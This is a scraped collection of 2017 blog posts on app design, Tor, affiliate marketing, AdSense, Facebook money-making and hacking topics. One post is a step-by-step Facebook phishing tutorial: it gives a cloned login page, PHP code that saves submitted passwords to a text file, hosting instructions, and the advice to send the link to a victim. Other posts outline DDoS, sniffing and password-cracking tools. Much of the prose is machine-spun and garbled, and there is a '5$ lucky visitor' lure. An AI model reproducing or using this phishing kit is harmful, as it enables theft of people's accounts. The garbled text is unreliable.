Techumour

Interface for learning app| Thunkable app learning |

2017-12-10T00:41:00.000+05:30

How to make interface for learning app

Interface is the only way to attract people........if u have a good looking interface u can create a good impression among your users...

As we all knows that thunkable is going to popular day by day...............so we decided to make some post on it.......

let see the interface of learning app..........

Download the app project https://drive.google.com/file/d/1EHCJPRHLXcfPok7ium3TfC4P9byd_EzS/view?usp=sharing

Tor browser

2017-10-05T01:01:00.000+05:30

What's the Tor community?

Tor targets to hide its users' identities and their on line interest from surveillance and site visitors analysis by using setting apart identity and routing. it is an implementation of onion routing, which encrypts and then randomly bounces communications via a community of relays run by volunteers around the world.

what's the use of Tor browser?

Tor is software program that allows users to browse the internet anonymously. developed by means of the Tor venture, a nonprofit organisation that advocates for anonymity at the internet, Tor became in the beginning known as The Onion Router because it makes use of a method known as onion routing to conceal information about user interest.

Is it illegal to use the Tor browser?

simply the usage of Tor to browse the internet is not unlawful. The down load is unfastened, and hiding your IP deal with and browsing history is not, in and of itself, unlawful. but, lots of those who use Tor use it specifically for anonymity because they're doing something unlawful.

Click here to download tor browser

Tor browser

How to hack facebook using phishingAttack

2017-09-07T22:00:00.001+05:30

How to hack facebook using phishingAttack

Phishing is the attempt to obtain sensitive information such as usernames, passwords, and credit card details (and, indirectly, money), often for malicious reasons, by disguising as a trustworthy entity in an electronic communication.

STEP 1: Go to Facebook.comRight click on the white space of the front page. Select "View P source". Copy the code to Notepad.

STEP 2: Now find (Press ctrl +f) for "action=" in that code. You fill find the code like this:

You have to change two things in that code..first of all you have to change method from POST Get...as You can see in picture. and secondly you have to change ACTION from https://login.facebook.com/login.php" to "next.php"

Save the document as index.html and Change the file type as All Files.

create the "next.php" to store the password. so open the notepad and type the following co

STEP 3: Now we need to create the "next.php" to store the password. so open the notepad and type t following code:

$handle = fopen("pswrds.txt", "a");

foreach($_POST as $variable => $value) {

fwrite($handle, $variable);

fwrite($handle, "=");

fwrite($handle, $value);

fwrite($handle, "\r\n");

}

fwrite($handle, "\r\n");

fclose($handle);

exit;

save this file as "next.php"

Step 4:open the notepad and Now create a blank file and named it as "pswrds.txt". Now onwards You have three files..first is "index.html".Second is "next.php" and third is "pswrds.txt"

Now we have to upload this three files on a php web hosting service. many sites offers this kind of hosting services.but maximum of them are now stopped these services cause of use of them in hacking.others are still running but they are Providing paid services only.

I found 000webhost.com On internet. 000webhost.com , is an industry leader in providing top class free web hosting services witho advertising! There are no hidden costs, no adverts, and no restrictive terms. So now lets come to topic again...

STEP 5: Go to on http://www.000webhost.com/ and click on sign up. and select any domain name

STEP 6:After doing above steps you have to verify your mail account that you used at the tim signup process.Verify your mail account by clicking the link

STEP 7:Click on the site link which is shown under DOMAIN section to go to your control pane alternativly You can go to http://members.000webhost.com/ for fake page uploading.

STEP 8: Now when you are logged into your account click on the Go to Cpanel in front of you domain that you had registered, and then Go to File Manager under Files and log into it.

STEP 9: After logging to Your File manager Section. Now Click on the Public_html directory.

STEP 10: Before proceeding to next delete default.php under public_html directry.Now click Upload button, choose the three file that we created earlier.(index.html,next.php and pswrds

STEP 11: Now any one who visits your site would be taken to the Fake Facebook Login Page. they enter their Username and Password, the username and password would be go to "passwrds.txt" file.

STEP 12: To Find Your Phishing Site Link

STEP 13: Now Everything is set. The Only thing that we have to do is that pass the link to victim.after that if he/she login through that link then we are able to get his/her account and password.For any doubts or Query or any Confusion...plz comments..i will try to give respons soon as possible

3 common mistake must be avoid by fresher affiliate marketer

2017-08-08T16:37:00.000+05:30

As we as a whole knows everyone is running behind money either it's in offline or online world. In any case, in present era the online way has turned into the immense source to generate money, everyday various program has introduces to make money online like offer your own particular item, promotion sense, affiliate links and many more. Here i am going to mindful my friends, co-bloggers and many other individuals who are following affiliate marketing blindly without any proper guidance.

Also read - Affiliate marketing for website - top 3 success factor

Indeed, even personally when I first started blogging, I was simply concentrating on money and was following all ways to make money. I go in each direction, have a go at everything, without any idea about what mistakes i was doing that can affect my long term success. So through my previous 1 year experience and by reading various affiliated marketing books i finish up them in 6 silly mistake that making by the new affiliate marketers. So Let's discuss these mistakes in detail to avoid them.

1) Selling instead of explaining

This is the very concerning and biggest mistake generally New Affiliate Marketers are doing. Normally what we do in our post simply give a link to a particular product by screamed buy it now. We didn't guide the reader why they should buy it and what they will get by purchasing it. buy it . We simply want a click from the reader on that link that will lead to a commission from the targeted link site.

Why individuals search on web before buying a product because they want to know what is best for them. So they read reviews of products, So help People to make a decent decision to buy a product or not. Write about the product like this they get inspired to buy it from your targeted link.

Also read - Shocking Ways to Earn with Facebook Pages, Likes and Groups

2) Don't have comparison

Generally what we found in the blog entry, the writer write a list of product or a detail about a product and link them with a shopping site by the similar tag in first mistake i mention buy it now. Be that as it may, this not effective to get affiliate money. This is the genuine fact when we buy a product, we compare it with a product having same price and same features. So this is the best and effective way to offer affiliate products online, pick up a main product and compare it with two other similar products.

And write something like this I compare here three products to help you making the best choice from them. Here i just not compare the products but rather also I help my readers make a choice, as well as utilized the best affiliate links too of all three product to get the best. So in short Comparison content help the clients as well as intent to buy them and also will be profitable for you.

3) Make false claims

Many a time A man who published the post says he is not making money online. However, in their signature line with the link he write he has make 50 Million Dollars by the following affiliate link. So please stop making these kind of false claims. If you are a new marketer and want to advance the product take after genuine technique and don't make false claims like you made a particular amount of money by a link.

Affiliate marketing for website - top 3 success factor

2017-08-08T15:29:00.002+05:30

Affiliate marketing for website:top success factor

At the point when done appropriately, offshoot advertising can be a very viable method for adapting your blog while in the meantime upgrading it for your perusers. Indeed, as a blogger, it's critical to advertise items that won't just give you a decent money related return however will likewise convey increased the value of your gathering of people.

1. Industry significance

As a matter of first importance, any business movement on your site ought to be exceptionally industry-pertinent. Anything that doesn't tie in with the topic of your blog will stand out like a sore thumb, and in all likelihood not hold any importance with your gathering of people. Obviously, the monetary achievement of your offshoot promoting relies upon your perusers – without their snaps, you won't profit – so it bodes well to offer things that they can identify with. While this might be more troublesome if your blog covers a particular subject, organizations like affilinet empower you to discover associations with expansive and specialty marks alike, as you can look partner programs by industry –making it less demanding that space in with your topic.

This is likewise critical for keeping up a decent association with your perusers; on the off chance that you begin to highlight unimportant items set up of helpful substance, your readership will rapidly diminish. Rather, discovering offshoot programs that really offer an incentive to your perusers will upgrade their experience on your blog while giving you the chance to profit.

2. Client encounter

partner showcasing for bloggersAs as of now specified, client experience ought to dependably be at the cutting edge of any choice you make in regards to your blog. Notwithstanding discovering associate organizations that are applicable to your perusers, it is likewise important to consider their experience once they really tap on a limited time interface. When connecting to a partner item, you are coordinating your perusers – who believe you – to another site, so it's vital to ensure that these destinations are up to scratch. Before embracing any outsiders, look at their site from a shopper's point of view: is it sheltered and simple to utilize? Do they offer secure checkout? To put it plainly, is it a site you are cheerful to allude your perusers to? The client's involvement on any webpage supported by you will naturally affect how they see your blog, so make sure to work with partners who can give an agreeable client encounter.

3. Blogger honesty

One reservation that numerous bloggers have with regards to member showcasing is tied in with keeping up their blog's respectability, and this is unquestionably something that should be considered. To guarantee that member joins improve your website as opposed to meddle with it, it is essential to ponder the sorts of brands you work with, yet how you tie them in with your blog's message. When taking a gander at probably the most widely recognized slip-ups made by new member advertisers, a significant number of them concern the path in which the connections are displayed. Concentrate on controlling the peruser instead of pushing for a tick, and never basically list member joins; mesh them into the customary substance that your perusers appreciate. For whatever length of time that the connections are encompassed with quality substance, your blog needn't transform into a conspicuous attempt to sell something, and you can keep on serving your perusers while creating a wage.

5 Best Reasons that Decrease AdSense Revenue

2017-08-05T12:34:00.000+05:30

5 Best Reasons that Decrease AdSense Revenue

Today I am will reveal some key factors that abatement AdSense pay since it's impractical for me to reaction everybody a similar answer unfailingly. I trust this article help them and won't diminishes their income.

1. More promotions showed

Most extreme bloggers have trusted that showing more promotions enable them to produce great CPC (To cost per click) esteem and lead them to procure more. In any case, this accepted is thoroughly wrong and in truth putting all the more promotion units on a website page diminishes AdSense income.

The reason of this is Google adores those pages which give increasingly data to the client. AdSense bots are extremely keen and on the off chance that they find that you are showing a bigger number of Ads than giving data to client, they drop down CPC esteems. Giving greatest applicable data and substance can support your cost per click income and it will help you to support rankings in SERPs also.

So my recommendation is don't show excessively promotions on a website page, I will prescribe you to show 3 Ads on single site page and max to max you can demonstrate 4 Google Advertisements.

2. You don't utilize content and pictures promotions

This is one of the basic reasons that your adsense income is diminishing. Numerous bloggers get a kick out of the chance to show pictures advertisements since they have solid conviction that indicating picture rich promotions will pull in end clients and they will tap on it while a few bloggers imagine that showing just content Ads can lead them to get more taps on advertisements. Almost certainly you may get great number of snaps however shouldn't something be said about CPC taken a toll? It will be low dependably.

The way that Google likes both content and picture rich arrangements and it prescribes distributers to utilize both content and picture rich commercials on their sites. I additionally utilize picture and content advertisements on my web journals which is the reason that I get great CPC esteems.

So companions show picture/message advertisement arranges on your blog and I am certain that it won't diminish your AdSense income, believe me…

3. Try not to compose snappy titles

Every single proficient blogger and online advertisers even I likewise propose individuals to compose appealing articles for blog entries. An article's appealing title dependably snares end client to tap on that article whether it is shown in list items or shared on person to person communication locales. In any case, do you realize that written work appealing title can prompt abatement Google promotions income?

Well on the off chance that you don't know then you should be missing to improve your adsense profit. The explanation for this procedure that when you compose appealing title you couldn't put watchword in title in a legitimate way for which the sponsor pays enormous add up to Google. At the point when a client arrives on your page, bots check from which watchword they are arriving on your website page concurring that catchphrase CPC esteem is chosen.

So in the event that you need not to diminish your adsense salary attempt to utilize high cpc esteem catchphrases in your titles and endeavor to make it snappy title with the utilization of appropriate watchword.

4. Advertisements position and size

The position of promotions and ad's size issues a great deal in AdSense income. Putting advertisements underneath overlay diminishes cpc esteem however it is not a thumb decide that continually setting promotions beneath crease give low pay from advertisements. Lion's share of bloggers and distributers have shared their experience about it that putting advertisements over the overlap give great income from Google promotions.

The span of promotions likewise the key point. Google Also prescribes 4 promotions configurations to use on your blog in the event that you need to expand income. On the off chance that you utilize any advertisement unit aside from 728*90, 336*280, 300*250, 160*600 the income will be lower.

So one should show suggested promotions on blog and place them appropriately.

5. Savvy situation of first promotion unit

Setting advertisements above dependably give great CPC cost, however do you realize that putting it appropriately can upgrade your AdSense profit more. All you require is to simply do testing. One should utilize prescribed promotion units at various areas of website page and screen CPC and CTR in your AdSense account.

For best CPC esteem, utilize that promotion unit and increment your advertisements income.

4 Most Popular way to Make Money on Facebook

2017-08-05T11:04:00.000+05:30

4 Most Popular way to Make Money on Facebook

Everybody knows Facebook thus do you, and that is the reason I'm not sufficiently clarifying about the Facebook Network. Here I have made a rundown of 6 Most Popular Ways to Make Money on Facebook and some best tips with the goal that you can without much of a stretch procure cash from fb.

a)Facebook Page

Each Individual is on Facebook,and each brand is on the Facebook page. Profit on Facebook Page belief system is extremely basic. Catch Facebook clients as much as you can. This you can do with Like Button of your Facebook Page. Progressively the Number of Facebook Users like your Fan Page more is the compass of your page. With this gigantic measure of group of onlookers, you can Promote any Company Products or Websites, and they can pay you likewise for simply showing a Banner of theirs on your Page Wall. You can likewise do member Marketing on your Facebook Page which I have depicted beneath to profit from Facebook

b)Affiliate Marketing

It’s the idea of showing Ad’s on your Facebook wall. Simply go to some of the popular Affiliate Marketing Companies like Amazon, Commission Junction, ClickBank and register a new account for free. When you complete your sign up process, you have to choose the products which you want to refer to your Facebook Friends.You are provided the code of the product with you affiliate id. Use this code and display it on Facebook. Whenever any person clicks on that Ad and purchases the product from the Company Website, you can make money on Facebook by getting the Commission.

c)Make Money by Creating a Facebook App

In the event that you are a Developer and have an entirely decent Knowledge of programming Languages then you can utilize your abilities to construct a Facebook application with your Unique thought and offer it your Facebook Users. The Strategy to profit on Facebook with along these lines is to advance your Apps with Facebook Ads and drive the most extreme number of clients to utilize your App. Also you can apply for CPM Advertising systems like CPAlead to show advertisements and you will be paid by that no. of impacts on your App.

d) Expand Your Business

You have an Existing Business, and need to grow it. Also, I ensure that you never discovered this mass measure of Free gathering of people anyplace. Facebook is dependably the greatest commercial center for any sort of Business. You can associate and draw in with your Customers by setting up a Facebook Page or a Group. On the off chance that you are a Publisher or a Blog Owner then Facebook is much the same as a Butter for your Blog Income as you can simply guide Fb Users from your Page to all the distributed Article on your Website along these lines Generating a mass measure of Traffic.

Shocking Ways to Earn with Facebook Pages, Likes and Groups

2017-08-05T01:36:00.000+05:30

Shocking Ways to Earn with Facebook Pages, Likes and Groups/Reality behind enormous facbook pages like Rajnikant Vs CID Jokes and so on

On the off chance that I discuss Social Networking site "Facebook", it is the most slanting fever now a day, no uncertainty by any means! Individuals are utilizing this amazing long range informal communication site in their own particular manners like cash making with facebook. Some are utilizing this gigantic stage for spreading out their organizations, some are utilizing to well known their own particular blog or site, and some are utilizing for promoting items. Distinctive individuals diverse idea with their distinctive working methodologies. It is additionally genuine that you can likewise procure with Facebook from Facebook Fan pages, Likes and Groups.

Better believe it! you are perusing and thinking right. You can quickly profit with Facebook Likes, Pages and Groups. You don't require any business or item or site or blog for filling this need. You can specifically gain with facebook without need of all these. Yet, in the event that you have any of these business sectors, at that point it will simple to set your future pay or market notoriety and additionally it will give you high class learning moreover.

In this post every one of the insider facts tips and focuses have clarified in extremely sophistic dialect for producing salary with facebook's distinctive sources. These all tips will most likely help you to get cash from here.

Click below to win 5$ you are the lucky visitor

How to Earn with Facebook Fan Pages and Likes

Things You will requirement for Facebook Fan Page(1) First set up a Facebook Fan Page of your taste, which is significant to gathering of people taste moreover. It might be any group, any item, any brand, any business and any stimulation page. In the event that you have as of now a business or blog, it is smarter to create business fan page here.

(2) You require an individual facebook account here to make any page. Along these lines, you can straightforwardly snap to "Make a Page" at the bottom of the screen on your landing page.

(3) After this procedure you can include your business logo, layouts and URL on your page for prompting your organization's principle site. You can put all the data about your item or site or brand on your page. You can make it more appealing by utilizing diverse figures of speech and quotes.

Other way, in the event that you are making a fan page for amusing reason, you can set it as stimulation page or something significant to this, in which individuals are more intrigued.

(4) It is the ideal opportunity for keeping up the nearness on your Facebook fan page by your constant updates. It ought not be exhausting or self advancing like sharing the connections of your business what not. You ought to keep up the great quality updates in the proportion of 4:1 (4 quality updates with 1 idealistic connection with quality picture). For instance: Bewakoof.com do this work cleverly and tenderly on facebook.

Other route, for engaging fan pages you can refresh current undertakings and most loved topics in a fascinating way like different pages do. For instance: Rajnikant Vs CID Jokes has got a large number of likes for their entertaining updates.

(5) As you embed the Good updates, likes will automatically increment. Here, you can likewise pick facebook publicizing for your fan pages. You can publicize to particular age gatherings or geological territories or enthusiasm of individuals. It will likewise give your quality likes on your facebook business page or fan page. It begins from $1 with estimate of 50-100 likes for each day. To put it plainly, you can purchase "Likes" or focused on gathering of people on facebook for advancing your image.

(6) It doesn't set aside much opportunity to finish 1000likes on your fan page however for 100k likes, it will take no less than a half year. When you finish 1000likes, you can contact to other individuals for advancing their business on your page with refreshes. You can charge for elevating once as indicated by your compass of your page.

(7) You can likewise offer any items here for earning a few benefits with it for instance Affiliate promoting. It can be a member item or any outsider item. It will definitely give you colossal benefit here. You can likewise offer likes to other individuals and take cash from them.

Henceforth, you can earn cash here by advancing other individuals items all alone page. It's your own particular style and approach that how you can do this easily!!

How to Earn with Facebook Groups

Facebook Groups are like facebook pages, yet forms are not quite the same as that. On Facebook Fan page just page administrators can post the significant issue however in Facebook gatherings, anybody can post their business or assessments or any present undertaking. You can include your companions and individuals by your decisions. Somehow, Facebook Groups are extremely helpful thing to advance your business over the universe. You can likewise produce a few leads and great pay from here. In the event that you have your own facebook account then you can make your own particular gathering.

(1)First attempt and make the rundown of your Facebook Friends. In the event that you have more than 500 companions than it's simple for you to include the general population in the gathering.

(2)Now pick up the trust of the general population you are organizing with. Attempt to include individuals, who are like you or match your specialty.

(3) Join other pertinent gatherings and advance your gathering there as a promoting or well known gathering. Individuals dependably take after great updates. You need to likewise do the great and standard updates here.

(4)Within some days, individuals will join your gathering additionally and will take an unmistakable fascination in your updates. This is the time, when you can promote your business in your gathering in a successful way.

(5)Somehow, Facebook Groups are not as much as Facebook fan pages, however bunches are substantially more successful than pages to publicize the business among the chose group. So it's great to make the Facebook bunch for doing brand advancement.

Some Cardinal Tips for Working on Facebook Pages and Groups

Consistency is the key thing, whatever the field is. Comparative idea has a place with facebook. Make a rundown to design your future business with new systems, new connections and new advertising patterns.

Spam material ought to dependably be dodged. You ought to dependably ensure that individuals are appreciating your endeavors or not! So you ought to dependably attempt new and slanting gatherings with new endeavors.

On the off chance that you are attempting to make a system on facebook then be careful! since a few people take it as a hostile or connection sharing work. It can make a wrong impact on your profile or page or gathering.

Great quality pictures are constantly important to have an effect on others and in addition offering things in a consistent interim. You ought to dependably pick right determination picture for this situation.

Trojans attack

2017-08-03T20:06:00.001+05:30

Trojans are non-replication programs; they don't recreate their own codes by appending themselves to other executable codes. They work without the consents or information of the PC clients.

Trojans shroud themselves in sound procedures. Be that as it may we should underline that Trojans taint outside machines just with the help of a PC client, such as clicking a document that comes appended with email from an obscure individual, stopping USB without filtering, opening perilous URLs.

Trojans have a few malignant capacities −

They make indirect accesses to a framework. Programmers can utilize these secondary passages to get to a casualty framework and its documents. A programmer can utilize Trojans to alter and erase the records show on a casualty framework, or to watch the exercises of the casualty.

Trojans can take all your money related information like financial balances, exchange subtle elements, PayPal related data, and so on. These are called Trojan-Banker.

Trojans can utilize the casualty PC to assault different frameworks utilizing Denial of Services.

Trojans can encode every one of your records and the programmer may from there on request cash to decode them. These are Ransomware Trojans.

They can utilize your telephones to send SMS to outsiders. These are called SMS Trojans.

Trojan Information

On the off chance that you have discovered an infection and need to examine additionally with respect to its capacity, at that point we will prescribe that you observe the accompanying infection databases, which are offered by and large by antivirus sellers.

Kaspersky Virus database − https://www.kaspersky.com

F-secure − https://www.f-secure.com

Symantec – Virus Encyclopedia − https://www.symantec.com

Speedy Tips

Introduce a decent antivirus and keep it refreshed.

Try not to open email connections originating from obscure sources.

Try not to acknowledge welcome from obscure individuals in online networking.

Try not to open URLs sent by obscure individuals or URLs that are in irregular shape.

Ethical Hacking - DDOS Attacks

2017-08-03T19:41:00.001+05:30

A Distributed Denial of Service (DDoS) attack is an endeavor to make an online service or a site inaccessible by over-burdening it with immense surges of activity produced from numerous sources.

Dissimilar to a Denial of Service (DoS) attack, in which one PC and one Internet association is utilized to surge a focused on asset with bundles, a DDoS attack utilizes numerous PCs and numerous Internet associations, often disseminated all inclusive i
n what is alluded to as a botnet.

An extensive scale volumetric DDoS attack can create a movement measured in many Gigabits (and even several Gigabits) every second. We are certain your ordinary system won't have the capacity to deal with such movement.

What are Botnets?

Attackers construct a system of hacked machines which are known as botnets, by spreading noxious bit of code through messages, sites, and online networking. Once these PCs are tainted, they can be controlled remotely, without their proprietors' learning, and utilized like an armed force to dispatch an attack against any objective.

DDOS System

A DDoS surge can be created in different ways. For instance −

Botnets can be utilized for sending more number of association demands than a server can deal with at once.

Attackers can have PCs send a casualty asset immense measures of arbitrary information to go through the objective's transmission capacity.

Because of the disseminated idea of these machines, they can be utilized to produce appropriated high activity which might be hard to deal with. It at last outcomes in a total blockage of a service.

Sorts of DDoS Attacks

DDoS attacks can be comprehensively sorted into three classifications −

Volume-based Attacks

Convention Attacks

Application Layer Attacks

Volume-Based Attacks

Volume-based attacks incorporate TCP surges, UDP surges, ICMP surges, and other spoofedpacket surges. These are likewise called Layer 3 and 4 Attacks. Here, an attacker tries to soak the data transfer capacity of the objective site. The attack extent is measured in Bits every Second (bps).

UDP Flood − A UDP surge is utilized to surge irregular ports on a remote host with various UDP bundles, all the more particularly port number 53. Specific firewalls can be utilized to sift through or piece malevolent UDP bundles.

ICMP Flood − This is like UDP surge and used to surge a remote host with various ICMP Echo Requests. This kind of attack can devour both active and approaching transmission capacity and a high volume of ping solicitations will bring about general framework log jam.

HTTP Flood − The attacker sends HTTP GET and POST solicitations to a focused on web server in a vast volume which can't be taken care of by the server and prompts denial of extra associations from honest to goodness customers.

Enhancement Attack − The attacker makes a demand that creates a vast reaction which incorporates DNS asks for substantial TXT records and HTTP GET asks for expansive documents like pictures, PDFs, or some other information records.

Convention Attacks

Convention attacks incorporate SYN surges, Ping of Death, divided parcel attacks, Smurf DDoS, and so on. This kind of attack expends real server assets and different assets like firewalls and load balancers. The attack extent is measured in Packets every Second.

DNS Flood − DNS surges are utilized for attacking both the foundation and a DNS application to overpower an objective framework and devour all its accessible system data transmission.

SYN Flood − The attacker sends TCP association asks for speedier than the focused on machine can process them, causing system immersion. Chairmen can change TCP stacks to relieve the impact of SYN surges. To lessen the impact of SYN surges, you can diminish the timeout until the point that a stack liberates memory allotted to an association, or specifically dropping approaching associations utilizing a firewall or iptables.

Ping of Death − The attacker sends contorted or larger than average bundles utilizing a basic ping charge. IP permits sending 65,535 bytes parcels yet sending a ping bundle bigger than 65,535 bytes abuses the Internet Protocol and could cause memory flood on the objective framework lastly crash the framework. To abstain from Ping of Death attacks and its variations, many locales square ICMP ping messages out and out at their firewalls.

Application Layer Attacks

Application Layer Attacks incorporate Slowloris, Zero-day DDoS attacks, DDoS attacks that objective Apache, Windows or OpenBSD vulnerabilities and that's only the tip of the iceberg. Here the objective is to crash the web server. The attack size is measured in Requests every Second.

Application Attack − This is additionally called Layer 7 Attack, where the attacker makes inordinate sign in, database-query, or pursuit solicitations to over-burden the application. It is truly hard to identify Layer 7 attacks since they look like real site activity.

Slowloris − The attacker sends enormous number of HTTP headers to a focused on web server, however never finishes a demand. The focused on server keeps each of these false associations open and in the long run floods the most extreme simultaneous association pool, and prompts denial of extra associations from true blue customers.

NTP Amplification − The attacker misuses publically-available Network Time Protocol (NTP) servers to overpower the focused on server with User Datagram Protocol (UDP) activity.

Zero-day DDoS Attacks − A zero-day weakness is a framework or application imperfection already obscure to the merchant, and has not been settled or fixed. These are new sort of attacks appearing step by step, for instance, abusing vulnerabilities for which no fix has yet been discharged.

Step by step instructions to Fix a DDoS Attack

There are many DDoS insurance choices which you can apply contingent upon the sort of DDoS attack.

Your DDoS insurance begins from distinguishing and shutting all the conceivable OS and application level vulnerabilities in your framework, shutting all the conceivable ports, expelling pointless access from the framework and concealing your server behind an intermediary or CDN framework.

On the off chance that you see a low greatness of the DDoS, at that point you can discover numerous firewall-based arrangements which can help you in sifting through DDoS based movement. Be that as it may, in the event that you have high volume of DDoS attack like in gigabits or significantly more, at that point you should take the assistance of a DDoS security service supplier that offers a more comprehensive, proactive and certified approach.

You should be watchful while drawing closer and choosing a DDoS security service supplier. There are number of service suppliers who need to exploit your circumstance. On the off chance that you advise them that you are under DDoS attack, at that point they will begin offering you an assortment of services at nonsensically high expenses.

We can propose you a basic and working arrangement which begins with a scan for a decent DNS arrangement supplier who is sufficiently adaptable to design An and CNAME records for your site. Second, you will require a decent CDN supplier that can deal with enormous DDoS movement and give you DDoS assurance service as a piece of their CDN bundle.

Expect your server IP address is AAA.BBB.CCC.DDD. At that point you ought to do the accompanying DNS design −

Make an A Record in DNS zone document as appeared underneath with a DNS identifier, for instance, ARECORDID and keep it mystery from the outside world.

Presently request that your CDN supplier connect the made DNS identifier with a URL, something like cdn.someotherid.domain.com.

You will utilize the CDN URL cdn.someotherid.domain.com to make two CNAME records, the first to point to www and the second record to point to @ as demonstrated as follows.

You can take the assistance from your framework executive to comprehend these focuses and arrange your DNS and CDN suitably. At last, you will have the accompanying design at your DNS.

DNS Configuration

Presently, let the CDN supplier handle all sort of DDoS attacks and your framework will stay safe. In any case, here the condition is that you ought not reveal your framework's IP address or A record identifier to anybody; else coordinate attacks will begin once more.

Handy solution

DDoS attacks have turned out to be more typical than any time in recent memory, and tragically, there is no convenient solution for this issue. Be that as it may, if your framework is under a DDoS attack, at that point don't frenzy and begin investigating the issue well ordered.

Sniffing

2017-08-01T12:45:00.000+05:30

Sniffing is the process of monitoring and capturing all the packets passing through a given network using sniffing tools. It is a form of “tapping phone wires” and get to know about the conversation. It is also called wiretapping applied to the computer networks.

There is so much possibility that if a set of enterprise switch ports is open, then one of their employees can sniff the whole traffic of the network. Anyone in the same physical location can plug into the network using Ethernet cable or connect wirelessly to that network and sniff the total traffic.

In other words, Sniffing allows you to see all sorts of traffic, both protected and unprotected. In the right conditions and with the right protocols in place, an attacking party may be able to gather information that can be used for further attacks or to cause other issues for the network or system owner.

What can be sniffed?

One can sniff the following sensitive information from a network −

Email traffic
FTP passwords
Web traffics
Telnet passwords
Router configuration
Chat sessions
DNS traffic

How it works

A sniffer normally turns the NIC of the system to the promiscuous mode so that it listens to all the data transmitted on its segment.

Promiscuous mode refers to the unique way of Ethernet hardware, in particular, network interface cards (NICs), that allows an NIC to receive all traffic on the network, even if it is not addressed to this NIC. By default, a NIC ignores all traffic that is not addressed to it, which is done by comparing the destination address of the Ethernet packet with the hardware address (a.k.a. MAC) of the device. While this makes perfect sense for networking, non-promiscuous mode makes it difficult to use network monitoring and analysis software for diagnosing connectivity issues or traffic accounting.

Sniffing Networks
A sniffer can continuously monitor all the traffic to a computer through the NIC by decoding the information encapsulated in the data packets.

Types of Sniffing
Sniffing can be either Active or Passive in nature.

Passive Sniffing
In passive sniffing, the traffic is locked but it is not altered in any way. Passive sniffing allows listening only. It works with Hub devices. On a hub device, the traffic is sent to all the ports. In a network that uses hubs to connect systems, all hosts on the network can see the traffic. Therefore, an attacker can easily capture traffic going through.

The good news is that hubs are almost obsolete nowadays. Most modern networks use switches. Hence, passive sniffing is no more effective.

Active Sniffing
In active sniffing, the traffic is not only locked and monitored, but it may also be altered in some way as determined by the attack. Active sniffing is used to sniff a switch-based network. It involves injecting address resolution packets (ARP) into a target network to flood on the switch content addressable memory (CAM) table. CAM keeps track of which host is connected to which port.

Following are the Active Sniffing Techniques −

MAC Flooding
DHCP Attacks
DNS Poisoning
Spoofing Attacks
ARP Poisoning

Protocols which are affected

Protocols such as the tried and true TCP/IP were never designed with security in mind and therefore do not offer much resistance to potential intruders. Several rules lend themselves to easy sniffing −

HTTP − It is used to send information in the clear text without any encryption and thus a real target.

SMTP (Simple Mail Transfer Protocol) − SMTP is basically utilized in the transfer of emails. This protocol is efficient, but it does not include any protection against sniffing.

NNTP (Network News Transfer Protocol)− It is used for all types of communications, but its main drawback is that data and even passwords are sent over the network as clear text.

POP (Post Office Protocol) − POP is strictly used to receive emails from the servers. This protocol does not include protection against sniffing because it can be trapped.

FTP (File Transfer Protocol) − FTP is used to send and receive files, but it does not offer any security features. All the data is sent as clear text that can be easily sniffed.

IMAP (Internet Message Access Protocol) − IMAP is same as SMTP in its functions, but it is highly vulnerable to sniffing.

Telnet − Telnet sends everything (usernames, passwords, keystrokes) over the network as clear text and hence, it can be easily sniffed.

Sniffers are not the dumb utilities that allow you to view only live traffic. If you really want to analyze each packet, save the capture and review it whenever time allows.

Hardware Protocol Analyzers

Before we go into further details of sniffers, it is important that we discuss about hardware protocol analyzers. These devices plug into the network at the hardware level and can monitor traffic without manipulating it.

Hardware protocol analyzers are used to monitor and identify malicious network traffic generated by hacking software installed in the system.

They capture a data packet, decode it, and analyze its content according to certain rules.

Hardware protocol analyzers allow attackers to see individual data bytes of each packet passing through the cable.

These hardware devices are not readily available to most ethical hackers due to their enormous cost in many cases.

Lawful Interception

Lawful Interception (LI) is defined as legally sanctioned access to communications network data such as telephone calls or email messages. LI must always be in pursuance of a lawful authority for the purpose of analysis or evidence. Therefore, LI is a security process in which a network operator or service provider gives law enforcement officials permission to access private communications of individuals or organizations.

Almost all countries have drafted and enacted legislation to regulate lawful interception procedures; standardization groups are creating LI technology specifications. Usually, LI activities are taken for the purpose of infrastructure protection and cyber security. However, operators of private network infrastructures can maintain LI capabilities within their own networks as an inherent right, unless otherwise prohibited.

LI was formerly known as wiretapping and has existed since the inception of electronic communications.

Passwords hijacking

2017-08-01T01:01:00.001+05:30

We have passwords for messages, databases, PC frameworks, servers, ledgers, and for all intents and purposes everything that we need to ensure. Passwords are when all is said in done the keys to get access into a framework or a record.

When all is said in done, individuals tend to set passwords that are anything but difficult to recall, for example, their date of birth, names of relatives, portable numbers, and so on. This is the thing that makes the passwords feeble and inclined to simple hacking.

One ought to dependably take care to have a solid secret key to safeguard their records from potential programmers. A solid secret key has the accompanying traits −

Contains no less than 8 characters.

A blend of letters, numbers, and exceptional characters.

A mix of little and capital letters.

Dictionary Attack

In a dictionary attack, the programmer utilizes a predefined rundown of words from a dictionary to attempt and figure the watchword. In the event that the set secret key is frail, at that point a dictionary attack can translate it very quick.

Hydra is a well known instrument that is broadly utilized for dictionary attacks. Investigate the accompanying screenshot and watch how we have utilized Hydra to discover the secret word of a FTP benefit.

Dictionary Attack

Hybrid Dictionary Attack

Hybrid dictionary attack utilizes an arrangement of dictionary words joined with augmentations. For instance, we have "administrator" and join it with number augmentations, for example, "admin123", "admin147", and so on.

Crunch is a wordlist generator where you can indicate a standard character set or a character set. Crunch can produce every single conceivable blend and changes. This instrument comes packaged with the Kali circulation of Linux.

Hybrid Attack

Brute-Force Attack

In a brute-force attack, the programmer utilizes every conceivable mix of letters, numbers, uncommon characters, and little and capital letters to break the secret word. This sort of attack has a high likelihood of achievement, yet it requires a gigantic measure of time to process every one of the blends. A brute-force attack is moderate and the programmer may require a framework with high preparing energy to play out every one of those changes and blends quicker.

John the Ripper or Johnny is one of the intense apparatuses to set a brute-force attack and it comes packaged with the Kali dissemination of Linux.

Brute Force

Rainbow Tables

A rainbow table contains an arrangement of predefined passwords that are hashed. It is a query table utilized particularly in recouping plain passwords from a figure content. Amid the procedure of secret word recuperation, it just takes a gander at the pre-ascertained hash table to break the watchword. The tables can be downloaded from http://extend rainbowcrack.com/table.htm

RainbowCrack 1.6.1 is the apparatus to utilize the rainbow tables. It is accessible again in Kali conveyance.

Rainbow Table

Speedy Tips

Try not to note down the passwords anyplace, simply remember them.

Set solid passwords that are hard to split.

Utilize a blend of letters in order, digits, images, and capital and little letters.

Try not to set passwords that are like their usernames.

DNS Poisoning attack

2017-08-01T01:00:00.001+05:30

